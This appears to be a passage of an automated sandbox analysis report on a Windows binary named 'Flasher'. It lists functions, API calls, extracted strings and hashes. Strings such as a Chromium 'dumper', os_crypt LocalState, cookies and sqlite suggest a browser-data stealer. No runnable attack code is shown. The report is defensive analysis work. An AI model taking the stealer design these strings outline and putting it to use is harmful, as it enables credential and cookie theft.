String ID: @$FALSETRUEUNKNOWN$LOCALAPPDATAsrc\chromium\dumper.rs$User Dat$\...C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\zip-0.5.13\src\write.rs$called `Result::unwrap()` on an `Err` value$ghijklmnopqrstuvwxyz0123456789$ingInvalidCharsetInvalidDateTimeDerConstraintFailedLifetimeErrorIncompleteNomErrordepthSqliteFailureSqliteSingleThreadedModeFromSqlConversionFailureIntegralValueOutOfRangeInvalidParameterNameInvalidPathExecuteReturnedResultsQueryReturnedNoRowsInvalidColumnInde$lid UTF-8 sequence in column nameC:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rusqlite-0.28.0\src\column.rs$os_cryptstruct LocalStatestruct LocalState with 1 element$ptyNullPointerResultUnimplementedArrayItemInvalidDeserializationVariantErrorBerTypeErrorBerValueErrorInvalidLengthInvalidValuetagInvalidTagUnknownTagUnexpectedTagexpectedactualUnexpectedClassIndefiniteLengthUnexpectedConstructExpectedConstructUnexpectedInteger$ractive-NoLogo-CommandGet-Culture | Select -ExpandProperty DisplayName$user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\serde_json-1.0.95\src\de.rs$!G$r0"$1"
API String ID: 3959763608-3636698432
Opcode ID: 514279ca581177360aad81b4dbfbd93ba246cf034cb7fc79d285ac82070163c0
Instruction ID: 0969f2b2a3915b014530cd9ae6207db28f856da4cd6cba2eb7d70279fa5d4b0b
Opcode Fuzzy Hash: 514279ca581177360aad81b4dbfbd93ba246cf034cb7fc79d285ac82070163c0
Instruction Fuzzy Hash: 20139176608B8681EB219F21E4523EEB764FB88B84F858033DA9D97799DF3DD521C700

Function 00007FF6D35B6CD6 Relevance: 31.3, APIs: 15, Strings: 5, Instructions: 1336memoryCOMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6D35B6E5C
HeapFree.KERNEL32 ref: 00007FF6D35B6F12

Strings

valid request parts, xrefs: 00007FF6D35B86CE
httphttpsfile://C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\url-2.3.1\src\parser.rs, xrefs: 00007FF6D35B7536
Pending error polled more than once, xrefs: 00007FF6D35B86EB
/scheme and authority is valid Uri, xrefs: 00007FF6D35B708E, 00007FF6D35B7D33
cookie2, xrefs: 00007FF6D35B7BAC

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeapmemmove
String ID: /scheme and authority is valid Uri$Pending error polled more than once$cookie2$httphttpsfile://C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\url-2.3.1\src\parser.rs$valid request parts
API String ID: 913535592-164153490
Opcode ID: efed3eb55699a0e2de158116223bd67f5029f52520c5e30ecf0768d2863680ca
Instruction ID: 6b0dd5caf1513e83e771d6645e3dd1903345f6e3ecc8d384d4df151dcbc248f7
Opcode Fuzzy Hash: efed3eb55699a0e2de158116223bd67f5029f52520c5e30ecf0768d2863680ca
Instruction Fuzzy Hash: BFE29D62A0CBC581EA61CB15E4463EEB360FB89B88F445126DF8D67B5ADF3CE195C700

Function 00007FF6D3522598 Relevance: 31.1, APIs: 15, Strings: 5, Instructions: 1062COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF6D352294A
memmove.VCRUNTIME140 ref: 00007FF6D352295F
memmove.VCRUNTIME140 ref: 00007FF6D352BE27
memmove.VCRUNTIME140 ref: 00007FF6D352BE7B
memmove.VCRUNTIME140 ref: 00007FF6D352BF99
memmove.VCRUNTIME140 ref: 00007FF6D352BFB5
memmove.VCRUNTIME140 ref: 00007FF6D352C934

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D352DBE4, 00007FF6D352DC8C
rset, xrefs: 00007FF6D352C2BE
charset, xrefs: 00007FF6D352C231, 00007FF6D352C2DF
utf-8, xrefs: 00007FF6D352BE33, 00007FF6D352C225
char, xrefs: 00007FF6D352C2B1

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove
String ID: called `Result::unwrap()` on an `Err` value$char$charset$rset$utf-8
API String ID: 2162964266-3032185218
Opcode ID: 2fa184bd21a3f7790df7821f05765b193702630b421f944819406471e3057dd4
Instruction ID: 305c866c450bb982fae829758d4247aab5f65c4184110cad462aff6fb1dbb2e3
Opcode Fuzzy Hash: 2fa184bd21a3f7790df7821f05765b193702630b421f944819406471e3057dd4
Instruction Fuzzy Hash: 3FB2C136A09ACA85EB348B25D9023FCA3A1FB05784F444133DA5DABB95CF7DE665C340

Function 00007FF6D35FDB71 Relevance: 27.4, APIs: 18, Instructions: 431
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIoCompletionPort.KERNEL32 ref: 00007FF6D35FDBA7
memset.VCRUNTIME140 ref: 00007FF6D35FDDE8
memmove.VCRUNTIME140 ref: 00007FF6D35FDE60
memmove.VCRUNTIME140 ref: 00007FF6D35FDEAA
memmove.VCRUNTIME140 ref: 00007FF6D35FDF37
memmove.VCRUNTIME140 ref: 00007FF6D35FDF52
memset.VCRUNTIME140 ref: 00007FF6D35FDFD0
memmove.VCRUNTIME140 ref: 00007FF6D35FE0C4
memmove.VCRUNTIME140 ref: 00007FF6D35FE114
GetLastError.KERNEL32 ref: 00007FF6D35FE191

Part of subcall function 00007FF6D35EFED0: GetProcessHeap.KERNEL32(0000000E,?,?,00007FF6D353370B,?,?,?,?), ref: 00007FF6D37388C1

memmove.VCRUNTIME140 ref: 00007FF6D35FE285
memmove.VCRUNTIME140 ref: 00007FF6D35FE2A0
memmove.VCRUNTIME140 ref: 00007FF6D35FE2C3
memmove.VCRUNTIME140 ref: 00007FF6D35FE2DE
memmove.VCRUNTIME140 ref: 00007FF6D35FE32E
memmove.VCRUNTIME140 ref: 00007FF6D35FE349
memmove.VCRUNTIME140 ref: 00007FF6D35FE35F
memmove.VCRUNTIME140 ref: 00007FF6D35FE37A

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: memmove$memset$CompletionCreateErrorHeapLastPortProcess
String ID:
API String ID: 1539442803-0
Opcode ID: 9b91af264cb77f406256b59a67414cc4c644c442582dbe0d8b68626fb21a7b0e
Instruction ID: 013ef343a4ae5342813b0a7e3583bbdea58041c76702da1767f8be631dabc869
Opcode Fuzzy Hash: 9b91af264cb77f406256b59a67414cc4c644c442582dbe0d8b68626fb21a7b0e
Instruction Fuzzy Hash: 67227232A09BC581E7609B25E4463AEB3A1FB85784F149136DBDD9379ADF3CE1A0C700

Function 00007FF6D3529D01 Relevance: 27.3, APIs: 16, Strings: 2, Instructions: 344memoryCOMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?), ref: 00007FF6D3529AB6
HeapFree.KERNEL32(?,?), ref: 00007FF6D3529B74
HeapFree.KERNEL32 ref: 00007FF6D352A103
CloseHandle.KERNEL32 ref: 00007FF6D352A110
HeapFree.KERNEL32 ref: 00007FF6D352A27E
HeapFree.KERNEL32 ref: 00007FF6D352A434
CloseHandle.KERNEL32 ref: 00007FF6D352A448
HeapFree.KERNEL32 ref: 00007FF6D352A468
HeapFree.KERNEL32(?,?), ref: 00007FF6D352A494
HeapFree.KERNEL32 ref: 00007FF6D352A4C6
HeapFree.KERNEL32(?,?), ref: 00007FF6D352A5DC
HeapFree.KERNEL32(?,?), ref: 00007FF6D352A5FC

Strings

No file has been started, xrefs: 00007FF6D3529DB5
C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.25\src\proto\h2\client.rs, xrefs: 00007FF6D352A687

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandle$memmove
String ID: C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.25\src\proto\h2\client.rs$No file has been started
API String ID: 4256591341-713680693
Opcode ID: 417b25d7ced5010478a5e0c224f22a4d48cea39c61df3d77def7355de9550a2a
Instruction ID: 3e5e1ce9239eb627c87d5b6a308f282f83b0ed30daabfa2e2e15f87b51c51443
Opcode Fuzzy Hash: 417b25d7ced5010478a5e0c224f22a4d48cea39c61df3d77def7355de9550a2a
Instruction Fuzzy Hash: 7712C136A09AC688E7709F21D8463ED73A1FB45B88F444037DA0DABB99CF79D265C340

Function 00007FF6D35BFCD3 Relevance: 23.6, APIs: 13, Strings: 2, Instructions: 1126memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF6D35BFDC5

Strings

httphttpsfile://C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\url-2.3.1\src\parser.rs, xrefs: 00007FF6D35C06D9, 00007FF6D35C0704, 00007FF6D35C0E19
HTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyREQUEST_METHODSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer=, xrefs: 00007FF6D35C06E0

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: HTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyREQUEST_METHODSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer=$httphttpsfile://C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\url-2.3.1\src\parser.rs
API String ID: 3298025750-1061000415
Opcode ID: 7cd5136b3e42d234a67513e18849590ffb5a2aa6941adb03c3e0e7bc223c34dc
Instruction ID: 6efc362df82c8f38fec07b2021b518d33f9780cb501ea4a5d13d7d565c1079e2
Opcode Fuzzy Hash: 7cd5136b3e42d234a67513e18849590ffb5a2aa6941adb03c3e0e7bc223c34dc
Instruction Fuzzy Hash: 84B2A332A0CBC685EA708B15E4463BEE760FB85794F444236DA8DA7B99CF7CE165C700

Function 00007FF6D35B50F7 Relevance: 21.6, APIs: 11, Strings: 1, Instructions: 573
memoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D3551F0E: HeapFree.KERNEL32 ref: 00007FF6D3551F2E
Part of subcall function 00007FF6D3551F0E: HeapFree.KERNEL32 ref: 00007FF6D3551F57

HeapFree.KERNEL32 ref: 00007FF6D35B5157
CertFreeCertificateContext.CRYPT32 ref: 00007FF6D35B5189
HeapFree.KERNEL32 ref: 00007FF6D35B51AD
HeapFree.KERNEL32 ref: 00007FF6D35B52C1
HeapFree.KERNEL32 ref: 00007FF6D35B553B
memmove.VCRUNTIME140 ref: 00007FF6D35B567B
HeapFree.KERNEL32 ref: 00007FF6D35B573D
memmove.VCRUNTIME140 ref: 00007FF6D35B5796
memmove.VCRUNTIME140 ref: 00007FF6D35B57DB
CertFreeCertificateContext.CRYPT32 ref: 00007FF6D35B5AF1
HeapFree.KERNEL32(?), ref: 00007FF6D35B5B0A

Strings

NO_PROXYno_proxy[, xrefs: 00007FF6D35B5239

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: Free$Heap$memmove$CertCertificateContext
String ID: NO_PROXYno_proxy[
API String ID: 3898322817-3749343514
Opcode ID: 965935827c95a79896765aefca84667381249f2dc3463391de2b907a85e28237
Instruction ID: 5d3db489b69f7e2a4f7698cc88a37217161dcfd1d1a1fd5703db972e56962ca5
Opcode Fuzzy Hash: 965935827c95a79896765aefca84667381249f2dc3463391de2b907a85e28237
Instruction Fuzzy Hash: 00528732A0CBC985E6659B14E4463EEB7A0FB99B80F444136CACDA7B99DF3CD165C700

Function 00007FF6D34F1000 Relevance: 17.2, APIs: 11, Instructions: 689
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapReAlloc.KERNEL32 ref: 00007FF6D34F1226
SafeArrayDestroy.OLEAUT32 ref: 00007FF6D34F134D
memmove.VCRUNTIME140 ref: 00007FF6D34F149F
SysFreeString.OLEAUT32 ref: 00007FF6D34F1EDA
HeapFree.KERNEL32 ref: 00007FF6D34F1F01
HeapFree.KERNEL32 ref: 00007FF6D34F1F4F

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$AllocArrayDestroySafeStringmemmove
String ID:
API String ID: 980382818-0
Opcode ID: 8e825ee235cc5a5f044f56684b05d2d0d1a0a2c6ddab51d64ee2ced3e7c850bb
Instruction ID: 0091734d061cfdf885716feac183e3b22826bb715a88a31d9c9fd93c4c539dfc
Opcode Fuzzy Hash: 8e825ee235cc5a5f044f56684b05d2d0d1a0a2c6ddab51d64ee2ced3e7c850bb
Instruction Fuzzy Hash: 70720436A18BC581E6708B16E8413AEF3A4FB88B80F544126DEDDA7B59DF3CD465DB00

Function 00007FF6D35783A7 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 00007FF6D357847B
RtlNtStatusToDosError.NTDLL ref: 00007FF6D357848B

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF6D3578406

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: CreateErrorFileStatus
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 3864118154-2333694755
Opcode ID: d431699d3922680ec265eb0371079d4bf6006aba1b65169a2c528513c2fa7973
Instruction ID: 0183f947a9305e93f11e56c6d42268db95c3a01c1588e7ff1cf8f0a06c58fdf5
Opcode Fuzzy Hash: d431699d3922680ec265eb0371079d4bf6006aba1b65169a2c528513c2fa7973
Instruction Fuzzy Hash: 1D71A672A08B8582E7509F25F4423AEB7A0FB88790F548136EB9D93B94DF3CD5A5C740

Function 00007FF6D34F3568 Relevance: 15.4, APIs: 12, Instructions: 399
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapFree.KERNEL32 ref: 00007FF6D34F38AD
HeapFree.KERNEL32 ref: 00007FF6D34F3914
HeapFree.KERNEL32 ref: 00007FF6D34F3956
HeapFree.KERNEL32 ref: 00007FF6D34F39C2
HeapFree.KERNEL32 ref: 00007FF6D34F39FA
HeapFree.KERNEL32 ref: 00007FF6D34F3A94
HeapFree.KERNEL32 ref: 00007FF6D34F3AC4
HeapFree.KERNEL32 ref: 00007FF6D34F3AF4
HeapFree.KERNEL32 ref: 00007FF6D34F3B84
HeapFree.KERNEL32 ref: 00007FF6D34F3BB0
HeapFree.KERNEL32 ref: 00007FF6D34F3BDC
HeapFree.KERNEL32 ref: 00007FF6D34F3C27

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0e7b6e309d271baea21f1f7964f811d1dcda9e9e3360c80bc6d8f0b7b7a3122c
Instruction ID: f15271d757ebc501ca4027bdb944936394a0a8e64c3fc5c1e1abd5a111989ecf
Opcode Fuzzy Hash: 0e7b6e309d271baea21f1f7964f811d1dcda9e9e3360c80bc6d8f0b7b7a3122c
Instruction Fuzzy Hash: 9F12F536608BD582D660CB16E84176EB7A1F789FD4F148026EE8DA3B68CF3DD056DB04

Function 00007FF6D3524A81 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 328
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6D35DB520: SetLastError.KERNEL32 ref: 00007FF6D35DB628
Part of subcall function 00007FF6D35DB520: GetTempPathW.KERNELBASE ref: 00007FF6D35DB63B
Part of subcall function 00007FF6D35DB520: GetLastError.KERNEL32 ref: 00007FF6D35DB644
Part of subcall function 00007FF6D35DB520: GetLastError.KERNEL32 ref: 00007FF6D35DB65D
Part of subcall function 00007FF6D35DB520: HeapFree.KERNEL32 ref: 00007FF6D35DB6DD

HeapFree.KERNEL32 ref: 00007FF6D3524D01
HeapFree.KERNEL32 ref: 00007FF6D3524D21
CoInitializeEx.COMBASE ref: 00007FF6D3524DAD
CoInitializeSecurity.OLE32 ref: 00007FF6D3524DE9
HeapFree.KERNEL32 ref: 00007FF6D3524EE8

Strings

ilureInvalidQueryMultipleStatementInvalidParameterCountSqlInputErrorsql, xrefs: 00007FF6D3524F0C
cannot access a Thread Local Storage value during or after destruction/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\std\src\thread\local.rs, xrefs: 00007FF6D3524ACB
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789, xrefs: 00007FF6D3524B56

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$ErrorLast$Initialize$PathSecurityTemp
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$cannot access a Thread Local Storage value during or after destruction/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\std\src\thread\local.rs$ilureInvalidQueryMultipleStatementInvalidParameterCountSqlInputErrorsql
API String ID: 695158741-1197944294
Opcode ID: 317065f3309f3bc7692c3311ea68b684aed2e2d83edcbcc849f8b0023c71ae39
Instruction ID: 607b712df9843ca5473ee42ee7cfcfda96063e497c8e86d22ef6f3745037c14b
Opcode Fuzzy Hash: 317065f3309f3bc7692c3311ea68b684aed2e2d83edcbcc849f8b0023c71ae39
Instruction Fuzzy Hash: 44025836609F86C5E7248F24E8817ED73A4FB49B88F404136DA9DABB95DF39D265C300

Function 00007FF6D35FAC61 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 491
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF6D35FAD4C
HeapFree.KERNEL32 ref: 00007FF6D35FAECA

Part of subcall function 00007FF6D3739678: memmove.VCRUNTIME140 ref: 00007FF6D3739729

HeapFree.KERNEL32 ref: 00007FF6D35FB3D3

Strings

assertion failed: prev.ref_count() >= 1, xrefs: 00007FF6D35FB2FB
thread name may not contain interior null bytes, xrefs: 00007FF6D35FB331
assertion failed: shared.shutdown_tx.is_some()C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.27.0\src\runtime\blocking\pool.rs, xrefs: 00007FF6D35FB35A
RUST_MIN_STACK(), xrefs: 00007FF6D35FAE44

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: FreeHeap$AddressSingleWakememmove
String ID: RUST_MIN_STACK()$assertion failed: prev.ref_count() >= 1$assertion failed: shared.shutdown_tx.is_some()C:\Users\user1\.cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.27.0\src\runtime\blocking\pool.rs$thread name may not contain interior null bytes
API String ID: 88297428-1933385349
Opcode ID: c2913b891a439f001e4ec644ef78c6405b13956385a80b290e67a12fbfb9e135
Instruction ID: 67f46848c7efc446e7b4ca2ac1b06962d9b47a45c339637119adeafca5b638be
Opcode Fuzzy Hash: c2913b891a439f001e4ec644ef78c6405b13956385a80b290e67a12fbfb9e135
Instruction Fuzzy Hash: 3B22F562A09B8581EB519B61E8023BDB7A4FB85B94F054637DF5EA7785DF3DE0A0C300

Function 00007FF6D35D5C30 Relevance: 12.2, APIs: 8, Instructions: 222
filenativesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteFile.NTDLL ref: 00007FF6D35D5C7C
WaitForSingleObject.KERNEL32 ref: 00007FF6D35D5C91
RtlNtStatusToDosError.NTDLL ref: 00007FF6D35D5CAF
MultiByteToWideChar.KERNEL32 ref: 00007FF6D35D5DA6
WriteConsoleW.KERNEL32 ref: 00007FF6D35D5DE6
WriteConsoleW.KERNEL32 ref: 00007FF6D35D5E4E
GetLastError.KERNEL32 ref: 00007FF6D35D5E58

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID: Write$ConsoleError$ByteCharFileLastMultiObjectSingleStatusWaitWide
String ID:
API String ID: 3155872604-0
Opcode ID: b70021959a8d49e3710f0c45d9b15a7d07c7693806351d7163ba7a343326666a
Instruction ID: a9403678b21acd096a3077531c54d36888f81ba701dd37dfd1d3b24197f24e62
Opcode Fuzzy Hash: b70021959a8d49e3710f0c45d9b15a7d07c7693806351d7163ba7a343326666a
Instruction Fuzzy Hash: 52911632E08A9689F7609B60E8463FDA351FB84794F444532E94EE7BD8EF7CD1A58304

Function 00007FF6D367A7F8 Relevance: 10.9, APIs: 1, Strings: 6, Instructions: 373COMMON

Download Yara Rule

Strings

MATCH, xrefs: 00007FF6D36C549C
BINARY, xrefs: 00007FF6D36C51AE
main, xrefs: 00007FF6D36C543E
RTRIM, xrefs: 00007FF6D36C5254
temp, xrefs: 00007FF6D36C544C
NOCASE, xrefs: 00007FF6D36C5223

Memory Dump Source

Source File: 00000000.00000002.1761733245.00007FF6D34F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D34F0000, based on PE: true

Associated: 00000000.00000002.1761715234.00007FF6D34F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761940553.00007FF6D37F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1761960273.00007FF6D37FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6d34f0000_Flasher.jbxd

Yara matches

Similarity

API ID:
String ID: BINARY$MATCH$NOCASE$RTRIM$main$temp
API String ID: 0-1145213229
Opcode ID: a564deada8be6c8bf1c27d46a6061b6102663dc72d368952f28415a0ae8ec3a0
Instruction ID: d1b42ee3bbfef9a3d742e894d576691ed9978ebd95a735057547c0a1de87547e
Opcode Fuzzy Hash: a564deada8be6c8bf1c27d46a6061b6102663dc72d368952f28415a0ae8ec3a0
Instruction Fuzzy Hash: 94F1A162A08BC285FB609F26A85227DABA5FF45B84F444137DA4DE7395DF3CE421E304

